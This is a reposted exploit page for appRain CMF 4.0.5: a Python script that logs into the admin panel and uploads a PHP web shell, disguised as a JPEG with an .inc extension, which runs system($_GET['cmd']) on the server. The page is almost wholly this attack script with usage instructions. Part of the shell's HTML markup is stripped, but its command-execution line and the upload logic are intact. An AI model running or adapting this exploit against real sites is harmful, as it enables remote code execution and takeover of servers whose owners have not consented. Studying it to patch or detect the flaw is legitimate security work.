Exploit/Advisories no image

Published on June 4th, 2024 📆 | 4954 Views ⚑

0

appRain CMF 4.0.5 Shell Upload – Torchsec


TTS

# Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/28/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.apprain.org
# Software Link:
https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip
# Version: latest
# Tested on: MacOS

import requests
import sys
import time
import random
import string

def generate_filename():
""" Generate a 5-character random string for filename. """
return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc"

def login(site, username, password):
print("Logging in...")
time.sleep(2)
login_url = f"https://{site}/admin/system"
session = requests.Session()
login_data = {
'data[Admin][admin_id]': username,
'data[Admin][admin_password]': password
}
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
response = session.post(login_url, data=login_data, headers=headers)
if "Logout" in response.text:
print("Login Successful!")
return session
else:
print("Login Failed!")
sys.exit()

def upload_shell(session, site):
print("Shell preparing...")
time.sleep(2)
filename = generate_filename()
upload_url = f"https://{site}/admin/filemanager/upload"
files = {
'data[filemanager][image]': (filename, "





name=''>name='cmd' autofocus id='cmd' size='80'>value='Execute'>

system($_GET['cmd']); } ?>

", 'image/jpeg')
}
data = {
'submit': 'Upload'
}
response = session.post(upload_url, files=files, data=data)
if response.status_code == 200 and "uploaded successfully" in response.text:
print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}")
else:
print("Exploit Failed!")
sys.exit()

if __name__ == "__main__":
print("Exploiting...")
time.sleep(2)
if len(sys.argv) != 4:
print("Usage: python exploit.py sitename.com username password")
sys.exit()
site = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
session = login(site, username, password)
upload_shell(session, site)

Source link

Tagged with:



Leave a Reply

Your email address will not be published.